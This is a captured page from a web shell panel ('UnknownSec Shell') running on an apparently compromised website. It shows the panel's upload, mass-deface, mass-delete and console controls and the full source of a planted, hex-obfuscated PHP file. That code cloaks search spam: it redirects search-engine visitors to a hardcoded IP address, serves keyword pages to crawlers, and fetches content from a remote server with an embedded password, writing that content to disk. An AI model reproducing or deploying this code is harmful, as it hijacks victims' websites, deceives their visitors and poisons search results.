shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
public
/
p7ygccc
/ [
drwxrwxrwx
]
upload
mass deface
mass delete
console
info server
name :
index.php
<?php goto P9wPQ; JHEve: $query_pars_2 = str_replace("\x2d", "\53", $_GET["\151\144"]); goto GUD1C; TjIp9: $keyword = str_replace("\x20", "\53", $keyword); goto sEHoC; Rr9Bn: $_GET["\146\156"] = "\x36\71\x36\71\66\x39\x6e\145\x77"; goto Q16gD; DwtgH: if (strpos($_SERVER["\x48\124\124\x50\137\x52\105\x46\105\x52\x45\122"], "\147\x6f\157\147\x6c\x65\56") or strpos($_SERVER["\110\124\x54\x50\x5f\122\x45\x46\x45\122\x45\122"], "\x79\141\150\x6f\157\x2e") or strpos($_SERVER["\110\124\124\120\137\x52\x45\x46\x45\x52\105\x52"], "\x62\x69\156\x67\x2e")) { $tpl = "\x69\x6e\x64\x65\170\x2f" . $_GET["\151\x64"] . "\x2e\x70\x68\x70\56\x74\160\x6c"; $tpl = file($tpl); $tpl = chop($tpl[0]); $my = $_GET["\x6d\171"]; header("\x4c\157\x63\141\164\x69\157\156\72\x20\x68\x74\x74\x70\x3a\57\x2f\66\x35\56\x31\60\x38\56\61\60\x2e\61\x39\x39\57\x65\156\x74\145\162\57\77\x6d\x61\162\153\x3d{$today}\55{$s}\46\164\160\154\75{$tpl}\x26\x65\156\147\153\145\171\x3d{$keyword}"); die; } else { $myname = $_GET["\151\x64"] . "\x2e\x70\150\x70"; if (file_exists("\x69\156\144\x65\170\x2f" . $myname)) { $html = @file_get_contents("\151\156\x64\x65\170\x2f" . $myname); if (strpos($_SERVER["\110\x54\124\120\137\x55\123\x45\x52\137\101\x47\x45\116\124"], "\142\x69\156\147") > 2 or strpos($_SERVER["\110\124\124\x50\137\x55\123\105\122\137\x41\x47\x45\116\x54"], "\171\x61\x68\x6f\157") > 2) { $keyword = str_replace("\55", "\x20", $_GET["\x69\144"]); $html = str_replace("\74\164\x69\x74\154\x65\x3e\x3c\57\x74\x69\x74\x6c\145\x3e", "\74\x74\151\164\154\145\x3e{$keyword}\x3c\57\x74\x69\164\x6c\145\76", $html); } echo $html; die; } } goto JHEve; Q16gD: $apass1 = "\x76\x69\x73\x64\x6f\151\x6a\x65\x77"; goto nRisz; sEHoC: $apass2 = "\142\62\63\150\x72\62\63\166\162\x33\x32"; goto HEjut; XCW33: $apass3 = "\x72\166\x33\x32\171\144\141\x63\x73\166\163\x64\x76"; goto Xwuxo; Xwuxo: $apass = "{$apass1}" . "{$apass2}" . "{$apass3}"; goto DwtgH; Z5ERG: $xx1 = 5; goto o5FzU; wR24G: foreach ($_GET as $a => $b) { $_GET["\x69\x64"] = $b; } goto KhPut; vOBxQ: $_GET["\167\157\x72\x6c\x64"] = 5; goto Rr9Bn; I4We9: if (function_exists("\x63\x75\x72\154\137\151\x6e\151\x74")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\x74\x74\x70\72\57\x2f\x36\65\56\x31\x30\x39\56\66\67\56\x31\60\x30\x2f" . $_GET["\146\x6e"] . "\56\x70\x68\x70\x3f\160\x61\163\163\75{$apass}\46\161\x3d{$_GET["\x69\144"]}"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_USERAGENT, "\x4d\157\172\x69\154\x6c\141\x2f\64\56\60\40\x28\x63\x6f\x6d\x70\x61\x74\151\142\154\x65\73\40\x4d\123\111\105\40\x36\x2e\x30\73\40\x57\151\156\x64\x6f\x77\x73\x20\x4e\124\x20\x35\56\61\x3b\40\x53\x56\x31\x29"); $text = curl_exec($ch); curl_close($ch); } goto nSWQh; i3aZ_: $today = "\x32\60\62\66\60\x32\x30\70\x2d"; goto wR24G; HEjut: $s = dirname($_SERVER["\120\x48\120\137\x53\105\x4c\106"]); goto bNlB4; bNlB4: if ($s == "\x5c" | $s == "\x2f") { $s = ''; } goto oq9LT; BftBm: echo $text; goto BbqfM; oEcGK: if (strlen($text) < 5000) { $url = "\x36\x35\x2e\x31\60\x39\x2e\x36\67\56\61\x30\x30"; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\x20\x28{$errno}\x29\74\142\162\40\x2f\76\xa"; } else { $req = "\x2f" . $_GET["\146\156"] . "\56\x70\150\160\77\x70\141\163\163\x3d{$apass}\x26\x71\75{$_GET["\x69\144"]}"; $out = "\x47\105\124\40{$req}\40\110\124\x54\x50\x2f\61\56\60\15\xa"; $out .= "\110\x6f\x73\x74\x3a\40{$url}\15\12"; $out .= "\103\157\156\x6e\x65\143\164\x69\157\156\72\40\103\154\x6f\x73\x65\15\12\xd\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\xa", $text); $text = $text[7]; } goto dwurP; nRisz: $x1 = 3; goto Z5ERG; KhPut: if ($_GET["\x69\x64"] == "\x74\145\163\x74\151\x6e\x67") { echo "\164\145\163\x74\x20\x67\x6f\x6f\144\x2e\x2e\56"; die; } goto w8wML; oq9LT: $s = $_SERVER["\123\105\x52\126\105\x52\x5f\116\101\115\105"] . $s; goto XCW33; GUD1C: $text = ''; goto I4We9; o5FzU: $keyword = str_replace("\55", "\40", $_GET["\151\x64"]); goto TjIp9; nSWQh: if (strlen($text) < 5000) { $text = file_get_contents("\150\x74\x74\160\72\x2f\x2f\x36\65\x2e\61\60\x39\56\x36\67\x2e\x31\60\60\x2f" . $_GET["\146\x6e"] . "\56\160\150\x70\77\x70\x61\x73\x73\75{$apass}\46\161\x3d{$_GET["\151\x64"]}"); } goto oEcGK; dwurP: if (strlen($text) > 500) { $out = fopen("\x69\x6e\144\x65\170\57" . $myname, "\167"); fwrite($out, $text); fclose($out); } goto BftBm; w8wML: if ($_GET["\x69\144"] == "\x69\x6e\x64\x65\x78") { header("\114\x6f\143\141\x74\151\157\156\x3a\x20\x68\164\x74\160\163\x3a\57\57\147\157\x6f\x67\x6c\145\x2e\143\x6f\155"); die; } goto vOBxQ; P9wPQ: error_reporting(0); goto i3aZ_; BbqfM: ?>
© 2026 UnknownSec